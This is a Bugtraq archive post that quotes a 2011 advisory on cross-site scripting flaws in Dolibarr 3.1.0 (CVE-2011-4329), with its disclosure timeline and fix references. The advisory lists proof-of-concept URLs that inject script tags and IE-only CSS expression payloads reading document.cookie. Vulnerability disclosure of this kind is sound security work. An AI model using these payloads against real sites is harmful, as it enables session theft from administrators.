Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
From: Henri Salo <henri () nerv fi>
Date: Mon, 21 Nov 2011 18:32:38 +0200

On Wed, Nov 09, 2011 at 09:59:18AM +0000, security () infoserve de wrote:
Advisory:               Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID:                  INFOSERVE-ADV2011-03
Author:                       Stefan Schurtz
Contact:              security () infoserve de
Affected Software:    Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL:           http://www.dolibarr.org/
Vendor Status:        fixed in the 3.1 branch

==========================
Vulnerability Description
==========================

Dolibarr 3.1.0 is prone to multiple XSS vulnerability

==================
PoC-Exploit
==================

Cross-Site-Scripting - parameter 'username'

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution:
=========

Fixed in the 3.1 branch

====================
Disclosure Timeline:
====================

08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
 
========
Credits:
========

Vulnerabilities found and advisory written by INFOSERVE Security Team

===========
References:
===========

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1
http://www.dolibarr.org/
http://www.infoserve.de/

CVE-2011-4329 is assigned for this issue.

Best regards,
Henri Salo


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]